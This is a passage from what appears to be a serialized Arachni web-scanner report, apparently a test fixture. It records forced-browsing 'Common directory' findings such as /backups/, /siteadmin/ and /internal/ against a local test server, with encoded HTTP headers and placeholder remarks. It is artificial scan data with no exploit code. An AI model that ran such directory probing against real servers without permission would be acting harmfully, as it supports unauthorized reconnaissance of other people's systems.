dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/scripts/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/scripts/
injected: scripts
id: scripts
elem: path
remarks: {}
method: ''
response: scripts
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/stats/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/stats/
injected: stats
id: stats
elem: path
remarks: {}
method: ''
response: stats
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/sitestats/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/sitestats/
injected: sitestats
id: sitestats
elem: path
remarks: {}
method: ''
response: sitestats
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/www/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/www/
injected: www
id: www
elem: path
remarks: {}
method: ''
response: www
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/errors/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/errors/
injected: errors
id: errors
elem: path
remarks: {}
method: ''
response: errors
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/siteadmin/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/siteadmin/
injected: siteadmin
id: siteadmin
elem: path
remarks: {}
method: ''
response: siteadmin
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/backups/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/backups/
injected: backups
id: backups
elem: path
remarks: {}
method: ''
response: backups
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/testing/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/testing/
injected: testing
id: testing
elem: path
remarks: {}
method: ''
response: testing
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/internal/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/internal/
injected: internal
id: internal
elem: path
remarks: {}
method: ''
response: internal
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/~home/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/~home/
injected: ~home
id: ~home
elem: path
remarks: {}
method: ''
response: ~home
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/home/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/home/
injected: home
id: home
elem: path
remarks:
:stuff:
- Blah
- Blah2
method: ''
response: home
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/~guest/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/~guest/
injected: ~guest
id: ~guest
elem: path
remarks: {}
method: ''
response: ~guest
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/~nobody/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/~nobody/
injected: ~nobody
id: ~nobody
elem: path
remarks: {}
method: ''
response: ~nobody
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/export/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/export/
injected: export
id: export
elem: path
remarks: {}
method: ''
response: export
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/testweb/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/testweb/
injected: testweb
id: testweb
elem: path
remarks: {}
method: ''
response: testweb
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
